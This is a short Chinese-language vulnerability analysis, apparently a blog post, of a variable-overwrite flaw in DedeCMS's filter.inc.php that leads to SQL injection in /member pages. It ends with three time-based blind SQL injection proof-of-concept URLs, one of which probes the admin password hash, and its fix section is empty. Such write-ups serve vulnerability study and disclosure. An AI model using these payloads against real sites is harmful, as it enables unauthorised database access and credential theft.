漏洞描述:dedecms的filter.inc.php这个文件在系统配置文件之后,里面有foreach循环创建变量,可以覆盖系统变量从而导致注入漏洞。
漏洞路径:/include/filter.inc.php
漏洞分析:
/include/filter.inc.php文件中:
1. 在magic_quotes_gpc=off的时候可以绕过_RunMagicQuotes的过滤
xxx.php?site=skyhome’s blog
2. 经过common.inc.php
$skyhome = skyhome\’s blog
3. 经过filter.inc.php
$skyhome = skyhomen’s blog //重新获得闭合攻击性
漏洞触发条件:
1. 程序不允许创建cfg_开头的变量,依靠这样来防御系统变量未初始化漏洞。
2. common.inc.php文件的漏洞我们创建了系统变量就可以触发此类漏洞,但是有的系统变量已经初始化了,而且是在common.inc.php文件foreach循环注册变量之后,就是说我们能创建,但是不能覆盖。
3. 但是filter.inc.php这个文件又进行了一次foreach循环也就是二次创建。所以如果包含了filter.inc.php文件我们就可以覆盖系统变量。
4. 在/member目录的大部分文件都包含这么一个文件/member/config.php,这个文件的前两句就是:
require_once(dirname(__FILE__).’/../include/common.inc.php’);
require_once(DEDEINC.’/filter.inc.php’);
也就是说member目录的大部分文件都受此漏洞影响,可以覆盖掉系统变量 。
0x1: POC1
http://127.0.0.1/dedecms5.5/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select pwd from dede_admin),1,1)='f',sleep(5),0)) -- - @`'`
0x2: POC2
http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select 1),1,1)='1',sleep(5),0)) -- - @`'`
0x3: POC3
http://127.0.0.1/dede/member/ajax_membergroup.php?action=desshow&mid=1&action=despost&mdescription=asd' where id=@`'` or(select if(substring((select user()),1,1)='r',sleep(5),0)) -- - @`'`
漏洞解决:
除非注明,均为湛蓝天空原创,转载请注明本文网址:http://skyhome.cn/dedecms/508.html